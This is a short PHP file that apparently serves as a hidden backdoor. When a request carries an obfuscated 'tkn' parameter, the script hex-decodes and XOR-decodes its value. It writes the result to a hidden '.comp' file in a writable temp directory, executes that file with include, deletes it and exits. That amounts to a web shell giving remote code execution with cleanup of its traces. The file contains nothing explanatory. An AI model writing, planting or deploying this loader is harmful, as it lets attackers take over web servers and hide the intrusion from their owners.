<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["tk\x6E"])){
	$k = array_filter(["/var/tmp", "/tmp", sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm"]);
	$data = hex2bin($_REQUEST["tk\x6E"]);
	$element='' ;$p = 0; do{$element .= chr(ord($data[$p]) ^ 7);$p++;} while($p < strlen($data));
	foreach ($k as $ref) {
    		if (max(0, is_dir($ref) * is_writable($ref))) {
    $hld = "$ref" . "/.comp";
    if (@file_put_contents($hld, $element) !== false) {
	include $hld;
	unlink($hld);
	die();
}
}
}
}